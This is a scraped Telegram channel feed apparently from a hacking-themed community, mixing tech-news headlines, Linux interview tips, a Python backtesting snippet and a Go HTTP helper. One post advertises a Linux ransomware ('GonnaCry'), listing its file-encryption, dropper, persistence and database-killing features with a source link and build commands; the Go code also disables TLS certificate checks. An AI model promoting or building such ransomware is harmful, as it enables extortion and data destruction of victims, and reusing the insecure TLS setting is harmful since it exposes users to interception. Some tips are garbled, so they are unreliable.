UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
Nokia announces its India laptop Purebook X14, here are the details.
#Technologies
Forwarded from UNDERCODE NEWS
Tim brings you some Super Deals for Google Nest Mini.
#Updates
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ How many types of shells are there in Linux?

They are the five Shells in Linux:

1) C Shell (csh): Similar to C grammar, and provides spell checking and job control.
Korn Shell (ksh): is a high-level programming language Shell.

2) Z Shell (Zsh): It provides some unique properties, such as observing login/logout monitoring, file name generation, startup file, and end comment.

3) Bourne Again Shell (bash): This is the default setting of the Linux distribution.

4) Friendly interactive Shell (Fish): It provides web-based configuration, automatic suggestions, etc.

#FastTips
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

What are the basic components of Linux?

1) Kernel: It is the core component of Linux, which acts as an interface between software and hardware.

2) Shell: It acts as an interface between the user and the kernel.

3) GUI: It stands for Graphical User Interface, which is another way for users to interact with the system. But this is different from images, buttons, and text boxes for interaction.

4) System Utilities: These are software functions that allow users to manage the computer.

5) Application: A set of functions designed to perform a set of tasks.

#FastTips
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
https://github.com/Awan check the contributions, I think I'm gonna get award of the year 2020 for most commits/contributions I have made ๐Ÿ˜‰


Recommended repo by a friend
Forwarded from UNDERCODE NEWS
New critical vulnerability in Eclipse, an attacker to gain full access to the victim's workspace.
#Vulnerabilities
Enjoy Support & Share โค๏ธ๐Ÿ‘๐Ÿป

T.me/UndercodeTesting
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Updated free Backtest trading strategies in Python:

Sub-modules
backtesting.backtesting
Core framework data structures. Objects from this module can also be imported from the top-level module directly, e.g โ€ฆ

backtesting.lib
Collection of common building blocks, helper auxiliary functions and composable strategy classes for reuse โ€ฆ

backtesting.test
Data and utilities for testing.

๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ :

1) download https://github.com/kernc/backtesting.py.git

2) $ pip install backtesting
Usage
from backtesting import Backtest, Strategy
from backtesting.lib import crossover

from backtesting.test import SMA, GOOG


class SmaCross(Strategy):
def init(self):
price = self.data.Close
self.ma1 = self.I(SMA, price, 10)
self.ma2 = self.I(SMA, price, 20)

def next(self):
if crossover(self.ma1, self.ma2):
self.buy()
elif crossover(self.ma2, self.ma1):
self.sell()


bt = Backtest(GOOG, SmaCross, commission=.002,
exclusive_orders=True)
stats = bt.run()
bt.plot()

๐Ÿฆ‘STILL NOT GETTING ??

Checkout : https://kernc.github.io/backtesting.py/doc/backtesting/#manuals

โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE NEWS
The EU requires authority to levy penalties of billions on tech giants.
#Technologies
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Explain the process management system calls in Linux?


1) fork (): used to create a new process.

2) exec(): execute a new process.

3) wait(): Wait until the process is executed.

4) exit(): Exit the process.

ยป System call to get the process ID:

1) getpid(): Find the unique process ID.

2) getppid(): Find the unique parent process ID.

โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE NEWS
Hakuhodo DYMP offers streamlined dashboards for unified TV management and digital advertising efficiency.
#Updates
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘CREATE YOUR OWN LINUX RANSOMWARE WITH ANY OS :

F E A T U R E S :

encrypts all user files with AES-256-CBC.
Random AES key and IV for each file.
Works even without internet connection.
Communication with the server to decrypt Client-private-key.
encrypts AES key with client-public-key RSA-2048.
encrypts client-private-key with RSA-2048 server-public-key.
Changes computer wallpaper -> Gnome, LXDE, KDE, XFCE.
Decryptor that communicate to server to send keys.
python webserver
Daemon
Dropper
Kills databases
About
A Linux Ransomware

๐Ÿ„ธ๐Ÿ„ฝ๐Ÿ…‚๐Ÿ…ƒ๐Ÿ„ฐ๐Ÿ„ป๐Ÿ„ป๐Ÿ„ธ๐Ÿ…‚๐Ÿ„ฐ๐Ÿ…ƒ๐Ÿ„ธ๐Ÿ„พ๐Ÿ„ฝ & ๐Ÿ…๐Ÿ…„๐Ÿ„ฝ :

open terminal and type :

1) download https://github.com/tarcisio-marinho/GonnaCry/tree/master/src

GonnaCry requires the pycrypto library and requests, installation below

~$ sudo pip install -r requeriments.txt

2) Compiling the code
~$ pyinstaller -F --clean main.py -n gonnacry

3) ~$ pyinstaller -F --clean decryptor.py -n decryptor

4) RUN AS PYTHON :

main.py GonnaCry start file
daemon.py dropped by main.py and run
dropper.py drop the malware on the computer
decryptor.py communicate with the server, decrypt keys and files
symmetric.py AES encryption
asymmetric.py RSA encryption
generate_keys.py Generate random AES keys
persistence.py Persistence routines for linux OS
get_files.py Find files to be encrypted
environment.py environment variables
variables.py Images and malware binaries
utils.py Utilities routines

Enjoy
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE NEWS
The high-tech unemployed? The opportunity to educate non-technological employees under the shadow of the crown.
#international
Forwarded from UNDERCODE NEWS
iPhone fell out of the plane and survived, filming the flight.
#international
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

golang http request package code:

package utils
import (
"crypto/tls"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
"sync"
)
var (
GET_METHOD = "GET"
POST_METHOD = "POST"
SENDTYPE_FROM = "from"
SENDTYPE_JSON = "json"
)
type HttpSend struct {
Link string
SendType string
Header map[string]string
Body map[string]string
sync.RWMutex
}
func NewHttpSend(link string) *HttpSend {
return &HttpSend{
Link: link,
SendType: SENDTYPE_FROM,
}
}
func (h *HttpSend) SetBody(body map[string]string) {
h.Lock()
defer h.Unlock()
h.Body = body
}
func (h *HttpSend) SetHeader(header map[string]string) {
h.Lock()
defer h.Unlock()
h.Header = header
}
func (h *HttpSend) SetSendType(send_type string) {
h.Lock()
defer h.Unlock()
h.SendType = send_type
}
func (h *HttpSend) Get() ([]byte, error) {
return h.send(GET_METHOD)
}
func (h *HttpSend) Post() ([]byte, error) {
return h.send(POST_METHOD)
}
func GetUrlBuild(link string, data map[string]string) string {
u, _ := url.Parse(link)
q := u.Query()
for k, v := range data {
q.Set(k, v)
}
u.RawQuery = q.Encode()
return u.String()
}
func (h *HttpSend) send(method string) ([]byte, error) {
var (
req *http.Request
resp *http.Response
client http.Client
send_data string
err error
)
if len(h.Body) > 0 {
if strings.ToLower(h.SendType) == SENDTYPE_JSON {
send_body, json_err := json.Marshal(h.Body)
if json_err != nil {
return nil, json_err
}
send_data = string(send_body)
} else {
send_body := http.Request{}
send_body.ParseForm()
for k, v := range h.Body {
send_body.Form.Add(k, v)
}
send_data = send_body.Form.Encode()
}
}
client.Transport = &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
req, err = http.NewRequest(method, h.Link, strings.NewReader(send_data))
if err != nil {
return nil, err
}
defer req.Body.Close()

//่ฎพ็ฝฎ้ป˜่ฎคheader
if len(h.Header) == 0 {
//json
if strings.ToLower(h.SendType) == SENDTYPE_JSON {
h.Header = map[string]string{
"Content-Type": "application/json; charset=utf-8",
}
} else { //form
h.Header = map[string]string{
"Content-Type": "application/x-www-form-urlencoded",
}
}
}
for k, v := range h.Header {
if strings.ToLower(k) == "host" {
req.Host = v
} else {
req.Header.Add(k, v)
}
}
resp, err = client.Do(req)
if err != nil {
return nil, err
}
defer resp.Body.Close()

if resp.StatusCode != http.StatusOK {
return nil, errors.New(fmt.Sprintf("error http code :%d", resp.StatusCode))
}
return ioutil.ReadAll(resp.Body)
}
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE NEWS
DeNA facilitates drug development with genetic data of up to 100,000 persons
#international
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Special extractor tool for windows :

F E A T U R E S :

password recovery
network monitoring
retrieving information from web browsers
work with video / audio
work with the Internet
command line utilities
tabletop
work with Outlook / Office
programming tools
disk utilities
system utilities
other utilities

download:
http://www.nirsoft.net/utils/index.html
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
Forwarded from UNDERCODE NEWS
Lastest report: Solarwinds FTP โ€˜solarwinds123โ€™ secret revealed in plain text?
#international
Forwarded from UNDERCODE NEWS
Net One employees illegally leaked $US 2,126,795.66, purchased real estate in Okinawa using a privately owned company
#Leaks